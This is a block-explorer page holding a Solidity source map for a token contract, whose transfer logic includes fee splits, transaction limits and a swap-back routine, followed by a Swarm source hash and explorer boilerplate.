4;8067:18;;;8060:62;8158:34;8138:18;;;8131:62;-1:-1:-1;;;8209:19:1;;;8202:40;8259:19;;39433:258:0;7807:477:1;39433:258:0;39747:9;39718:39;;;;:28;:39;;;;;39760:12;39718:54;;39223:573;-1:-1:-1;;;;;39889:31:0;;;;;;:25;:31;;;;;;;;:92;;;;-1:-1:-1;;;;;;39946:35:0;;;;;;:31;:35;;;;;;;;39945:36;39889:92;39863:1147;;;40068:20;;40058:6;:30;;40024:169;;;;-1:-1:-1;;;40024:169:0;;8491:2:1;40024:169:0;;;8473:21:1;8530:2;8510:18;;;8503:30;8569:34;8549:18;;;8542:62;-1:-1:-1;;;8620:18:1;;;8613:51;8681:19;;40024:169:0;8289:417:1;40024:169:0;40276:9;;-1:-1:-1;;;;;11082:18:0;;11055:7;11082:18;;;;;;;;;;;40250:22;;:6;:22;:::i;:::-;:35;;40216:140;;;;-1:-1:-1;;;40216:140:0;;8913:2:1;40216:140:0;;;8895:21:1;8952:2;8932:18;;;8925:30;-1:-1:-1;;;8971:18:1;;;8964:49;9030:18;;40216:140:0;8711:343:1;40216:140:0;39863:1147;;;-1:-1:-1;;;;;40454:29:0;;;;;;:25;:29;;;;;;;;:92;;;;-1:-1:-1;;;;;;40509:37:0;;;;;;:31;:37;;;;;;;;40508:38;40454:92;40428:582;;;40633:20;;40623:6;:30;;40589:170;;;;-1:-1:-1;;;40589:170:0;;9261:2:1;40589:170:0;;;9243:21:1;9300:2;9280:18;;;9273:30;9339:34;9319:18;;;9312:62;-1:-1:-1;;;9390:18:1;;;9383:52;9452:19;;40589:170:0;9059:418:1;40428:582:0;-1:-1:-1;;;;;40790:35:0;;;;;;:31;:35;;;;;;;;40785:225;;40910:9;;-1:-1:-1;;;;;11082:18:0;;11055:7;11082:18;;;;;;;;;;;40884:22;;:6;:22;:::i;:::-;:35;;40850:140;;;;-1:-1:-1;;;40850:140:0;;8913:2:1;40850:140:0;;;8895:21:1;8952:2;8932:18;;;8925:30;-1:-1:-1;;;8971:18:1;;;8964:49;9030:18;;40850:140:0;8711:343:1;40850:140:0;41097:4;41048:28;11082:18;;;;;;;;;;;41155;;41131:42;;;;;;;41204:35;;-1:-1:-1;41228:11:0;;-1:-1:-1;;;41228:11:0;;;;41204:35;:61;;;;-1:-1:-1;41257:8:0;;-1:-1:-1;;;41257:8:0;;;;41256:9;41204:61;:110;;;;-1:-1:-1;;;;;;41283:31:0;;;;;;:25;:31;;;;;;;;41282:32;41204:110;:153;;;;-1:-1:-1;;;;;;41332:25:0;;;;;;:19;:25;;;;;;;;41331:26;41204:153;:194;;;;-1:-1:-1;;;;;;41375:23:0;;;;;;:19;:23;;;;;;;;41374:24;41204:194;41186:326;;;41425:8;:15;;-1:-1:-1;;;;41425:15:0;-1:-1:-1;;;41425:15:0;;;41457:10;:8;:10::i;:::-;41484:8;:16;;-1:-1:-1;;;;41484:16:0;;;41186:326;41540:8;;-1:-1:-1;;;;;41650:25:0;;41524:12;41650:25;;;:19;:25;;;;;;41540:8;-1:-1:-1;;;41540:8:0;;;;;41539:9;;41650:25;;:52;;-1:-1:-1;;;;;;41679:23:0;;;;;;:19;:23;;;;;;;;41650:52;41646:100;;;-1:-1:-1;41729:5:0;41646:100;41758:12;41863:7;41859:1099;;;-1:-1:-1;;;;;41915:29:0;;;;;;:25;:29;;;;;;;;:50;;;;;41964:1;41948:13;;:17;41915:50;41911:898;;;41993:34;42023:3;41993:25;42004:13;;41993:6;:10;;:25;;;;:::i;:::-;:29;;:34::i;:::-;41986:41;;42080:13;;42062:14;;42055:4;:21;;;;:::i;:::-;42054:39;;;;:::i;:::-;42034:16;;:59;;;;;;;:::i;:::-;;;;-1:-1:-1;;42162:13:0;;42142:16;;42135:23;;:4;:23;:::i;:::-;42134:41;;;;:::i;:::-;42112:18;;:63;;;;;;;:::i;:::-;;;;-1:-1:-1;;42232:13:0;;42218:10;;42211:17;;:4;:17;:::i;:::-;42210:35;;;;:::i;:::-;42194:12;;:51;;;;;;;:::i;:::-;;;;-1:-1:-1;;42314:13:0;;42294:16;;42287:23;;:4;:23;:::i;:::-;42286:41;;;;:::i;:::-;42264:18;;:63;;;;;;;:::i;:::-;;;;-1:-1:-1;41911:898:0;;-1:-1:-1;41911:898:0;;-1:-1:-1;;;;;42389:31:0;;;;;;:25;:31;;;;;;;;:51;;;;;42439:1;42424:12;;:16;42389:51;42385:424;;;42468:33;42497:3;42468:24;42479:12;;42468:6;:10;;:24;;;;:::i;:33::-;42461:40;;42553:12;;42536:13;;42529:4;:20;;;;:::i;:::-;42528:37;;;;:::i;:::-;42508:16;;:57;;;;;;;:::i;:::-;;;;-1:-1:-1;;42633:12:0;;42614:15;;42607:22;;:4;:22;:::i;:::-;42606:39;;;;:::i;:::-;42584:18;;:61;;;;;;;:::i;:::-;;;;-1:-1:-1;;42701:12:0;;42688:9;;42681:16;;:4;:16;:::i;:::-;42680:33;;;;:::i;:::-;42664:12;;:49;;;;;;;:::i;:::-;;;;-1:-1:-1;;42781:12:0;;42762:15;;42755:22;;:4;:22;:::i;:::-;42754:39;;;;:::i;:::-;42732:18;;:61;;;;;;;:::i;:::-;;;;-1:-1:-1;;42385:424:0;42829:8;;42825:91;;42858:42;42874:4;42888;42895;42858:15;:42::i;:::-;42932:14;42942:4;42932:14;;:::i;:::-;;;41859:1099;42970:33;42986:4;42992:2;42996:6;42970:15;:33::i;:::-;38277:4734;;;;38164:4847;;;:::o;3503:191::-;3596:6;;;-1:-1:-1;;;;;3613:17:0;;;-1:-1:-1;;;;;;3613:17:0;;;;;;;3646:40;;3596:6;;;3613:17;3596:6;;3646:40;;3577:16;;3646:40;3566:128;3503:191;:::o;15030:733::-;-1:-1:-1;;;;;15170:20:0;;15162:70;;;;-1:-1:-1;;;15162:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15251:23:0;;15243:71;;;;-1:-1:-1;;;15243:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15411:17:0;;15387:21;15411:17;;;;;;;;;;;15447:23;;;;15439:74;;;;-1:-1:-1;;;15439:74:0;;10209:2:1;15439:74:0;;;10191:21:1;10248:2;10228:18;;;10221:30;10287:34;10267:18;;;10260:62;-1:-1:-1;;;10338:18:1;;;10331:36;10384:19;;15439:74:0;10007:402:1;15439:74:0;-1:-1:-1;;;;;15549:17:0;;;:9;:17;;;;;;;;;;;15569:22;;;15549:42;;15613:20;;;;;;;;:30;;15585:6;;15549:9;15613:30;;15585:6;;15613:30;:::i;:::-;;;;;;;;15678:9;-1:-1:-1;;;;;15661:35:0;15670:6;-1:-1:-1;;;;;15661:35:0;;15689:6;15661:35;;;;1410:25:1;;1398:2;1383:18;;1264:177;15661:35:0;;;;;;;;15151:612;15030:733;;;:::o;43579:1802::-;43662:4;43618:23;11082:18;;;;;;;;;;;43618:50;;43670:12;43693:25;43782:12;;43761:18;;43740;;43721:16;;:37;;;;:::i;:::-;:58;;;;:::i;:::-;:73;;;;:::i;:::-;43693:101;-1:-1:-1;43809:20:0;43805:59;;43846:7;;;43579:1802::o;43805:59::-;43896:18;;:23;;43917:2;43896:23;:::i;:::-;43878:15;:41;43874:115;;;43954:18;;:23;;43975:2;43954:23;:::i;:::-;43936:41;;43874:115;44009:23;44096:1;44076:17;44054:18;;44036:15;:36;;;;:::i;:::-;44035:58;;;;:::i;:::-;:62;;;;:::i;:::-;44009:88;-1:-1:-1;44108:26:0;44137:36;:15;44009:88;44137:19;:36::i;:::-;44108:65;-1:-1:-1;44214:21:0;44248:36;44108:65;44248:16;:36::i;:::-;44297:18;44318:44;:21;44344:17;44318:25;:44::i;:::-;44297:65;;44369:21;44393:55;44430:17;44393:32;44408:16;;44393:10;:14;;:32;;;;:::i;:55::-;44369:79;;44459:23;44485:57;44524:17;44485:34;44500:18;;44485:10;:14;;:34;;;;:::i;:57::-;44459:83;;44553:17;44573:51;44606:17;44573:28;44588:12;;44573:10;:14;;:28;;;;:::i;:51::-;44553:71;-1:-1:-1;44637:23:0;44553:71;44692:15;44663:26;44676:13;44663:10;:26;:::i;:::-;:44;;;;:::i;:::-;:56;;;;:::i;:::-;44753:1;44732:18;:22;;;44759:16;:20;;;44790:18;:22;;;44823:12;:16;;;44874:9;;44866:45;;44637:82;;-1:-1:-1;;;;;;44874:9:0;;44897;;44866:45;44753:1;44866:45;44897:9;44874;44866:45;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;44944:15:0;;44936:57;;44852:59;;-1:-1:-1;;;;;;44944:15:0;;44973;;44936:57;;;;44973:15;44944;44936:57;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;44922:71:0;;-1:-1:-1;;45012:19:0;;;;;:42;;;45053:1;45035:15;:19;45012:42;45008:278;;;45071:46;45084:15;45101;45071:12;:46::i;:::-;45241:18;;45137:137;;;10826:25:1;;;10882:2;10867:18;;10860:34;;;10910:18;;;10903:34;;;;45137:137:0;;;;;;10814:2:1;45137:137:0;;;45008:278;45320:13;;45312:61;;-1:-1:-1;;;;;45320:13:0;;;;45347:21;;45312:61;;;;45347:21;45320:13;45312:61;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;;;;43579:1802:0:o;23339:98::-;23397:7;23424:5;23428:1;23424;:5;:::i;:::-;23417:12;23339:98;-1:-1:-1;;;23339:98:0:o;23738:::-;23796:7;23823:5;23827:1;23823;:5;:::i;22982:98::-;23040:7;23067:5;23071:1;23067;:5;:::i;45640:589::-;45790:16;;;45804:1;45790:16;;;;;;;;45766:21;;45790:16;;;;;;;;;;-1:-1:-1;45790:16:0;45766:40;;45835:4;45817;45822:1;45817:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;45817:23:0;;;-1:-1:-1;;;;;45817:23:0;;;;;45861:15;-1:-1:-1;;;;;45861:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;45851:4;45856:1;45851:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;45851:32:0;;;-1:-1:-1;;;;;45851:32:0;;;;;45896:62;45913:4;45928:15;45946:11;45896:8;:62::i;:::-;45997:224;;-1:-1:-1;;;45997:224:0;;-1:-1:-1;;;;;45997:15:0;:66;;;;:224;;46078:11;;46104:1;;46148:4;;46175;;46195:15;;45997:224;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;45695:534;45640:589;:::o;43019:515::-;43167:62;43184:4;43199:15;43217:11;43167:8;:62::i;:::-;43476:9;;43272:254;;-1:-1:-1;;;43272:254:0;;43344:4;43272:254;;;12794:34:1;12844:18;;;12837:34;;;43390:1:0;12887:18:1;;;12880:34;;;12930:18;;;12923:34;-1:-1:-1;;;;;43476:9:0;;;12973:19:1;;;12966:44;43500:15:0;13026:19:1;;;13019:35;43272:15:0;:31;;;;;;43311:9;;12728:19:1;;43272:254:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;43019:515;;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:131::-;-1:-1:-1;;;;;691:31:1;;681:42;;671:70;;737:1;734;727:12;752:315;820:6;828;881:2;869:9;860:7;856:23;852:32;849:52;;;897:1;894;887:12;849:52;936:9;923:23;955:31;980:5;955:31;:::i;:::-;1005:5;1057:2;1042:18;;;;1029:32;;-1:-1:-1;;;752:315:1:o;1446:247::-;1505:6;1558:2;1546:9;1537:7;1533:23;1529:32;1526:52;;;1574:1;1571;1564:12;1526:52;1613:9;1600:23;1632:31;1657:5;1632:31;:::i;2141:456::-;2218:6;2226;2234;2287:2;2275:9;2266:7;2262:23;2258:32;2255:52;;;2303:1;2300;2293:12;2255:52;2342:9;2329:23;2361:31;2386:5;2361:31;:::i;:::-;2411:5;-1:-1:-1;2468:2:1;2453:18;;2440:32;2481:33;2440:32;2481:33;:::i;:::-;2141:456;;2533:7;;-1:-1:-1;;;2587:2:1;2572:18;;;;2559:32;;2141:456::o;2791:416::-;2856:6;2864;2917:2;2905:9;2896:7;2892:23;2888:32;2885:52;;;2933:1;2930;2923:12;2885:52;2972:9;2959:23;2991:31;3016:5;2991:31;:::i;:::-;3041:5;-1:-1:-1;3098:2:1;3083:18;;3070:32;3140:15;;3133:23;3121:36;;3111:64;;3171:1;3168;3161:12;3111:64;3194:7;3184:17;;;2791:416;;;;;:::o;3212:388::-;3280:6;3288;3341:2;3329:9;3320:7;3316:23;3312:32;3309:52;;;3357:1;3354;3347:12;3309:52;3396:9;3383:23;3415:31;3440:5;3415:31;:::i;:::-;3465:5;-1:-1:-1;3522:2:1;3507:18;;3494:32;3535:33;3494:32;3535:33;:::i;3605:380::-;3684:1;3680:12;;;;3727;;;3748:61;;3802:4;3794:6;3790:17;3780:27;;3748:61;3855:2;3847:6;3844:14;3824:18;3821:38;3818:161;;;3901:10;3896:3;3892:20;3889:1;3882:31;3936:4;3933:1;3926:15;3964:4;3961:1;3954:15;3818:161;;3605:380;;;:::o;4399:127::-;4460:10;4455:3;4451:20;4448:1;4441:31;4491:4;4488:1;4481:15;4515:4;4512:1;4505:15;4531:128;4571:3;4602:1;4598:6;4595:1;4592:13;4589:39;;;4608:18;;:::i;:::-;-1:-1:-1;4644:9:1;;4531:128::o;4664:356::-;4866:2;4848:21;;;4885:18;;;4878:30;4944:34;4939:2;4924:18;;4917:62;5011:2;4996:18;;4664:356::o;6646:401::-;6848:2;6830:21;;;6887:2;6867:18;;;6860:30;6926:34;6921:2;6906:18;;6899:62;-1:-1:-1;;;6992:2:1;6977:18;;6970:35;7037:3;7022:19;;6646:401::o;7052:399::-;7254:2;7236:21;;;7293:2;7273:18;;;7266:30;7332:34;7327:2;7312:18;;7305:62;-1:-1:-1;;;7398:2:1;7383:18;;7376:33;7441:3;7426:19;;7052:399::o;9482:168::-;9522:7;9588:1;9584;9580:6;9576:14;9573:1;9570:21;9565:1;9558:9;9551:17;9547:45;9544:71;;;9595:18;;:::i;:::-;-1:-1:-1;9635:9:1;;9482:168::o;9655:217::-;9695:1;9721;9711:132;;9765:10;9760:3;9756:20;9753:1;9746:31;9800:4;9797:1;9790:15;9828:4;9825:1;9818:15;9711:132;-1:-1:-1;9857:9:1;;9655:217::o;9877:125::-;9917:4;9945:1;9942;9939:8;9936:34;;;9950:18;;:::i;:::-;-1:-1:-1;9987:9:1;;9877:125::o;11080:127::-;11141:10;11136:3;11132:20;11129:1;11122:31;11172:4;11169:1;11162:15;11196:4;11193:1;11186:15;11212:251;11282:6;11335:2;11323:9;11314:7;11310:23;11306:32;11303:52;;;11351:1;11348;11341:12;11303:52;11383:9;11377:16;11402:31;11427:5;11402:31;:::i;11468:980::-;11730:4;11778:3;11767:9;11763:19;11809:6;11798:9;11791:25;11835:2;11873:6;11868:2;11857:9;11853:18;11846:34;11916:3;11911:2;11900:9;11896:18;11889:31;11940:6;11975;11969:13;12006:6;11998;11991:22;12044:3;12033:9;12029:19;12022:26;;12083:2;12075:6;12071:15;12057:29;;12104:1;12114:195;12128:6;12125:1;12122:13;12114:195;;;12193:13;;-1:-1:-1;;;;;12189:39:1;12177:52;;12284:15;;;;12249:12;;;;12225:1;12143:9;12114:195;;;-1:-1:-1;;;;;;;12365:32:1;;;;12360:2;12345:18;;12338:60;-1:-1:-1;;;12429:3:1;12414:19;12407:35;12326:3;11468:980;-1:-1:-1;;;11468:980:1:o;13065:306::-;13153:6;13161;13169;13222:2;13210:9;13201:7;13197:23;13193:32;13190:52;;;13238:1;13235;13228:12;13190:52;13267:9;13261:16;13251:26;;13317:2;13306:9;13302:18;13296:25;13286:35;;13361:2;13350:9;13346:18;13340:25;13330:35;;13065:306;;;;;:::o

Swarm Source

ipfs://381692242a530bdf6cf493c780f92a557d01e0e5c40d85226da5c7c6aa091ef5
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.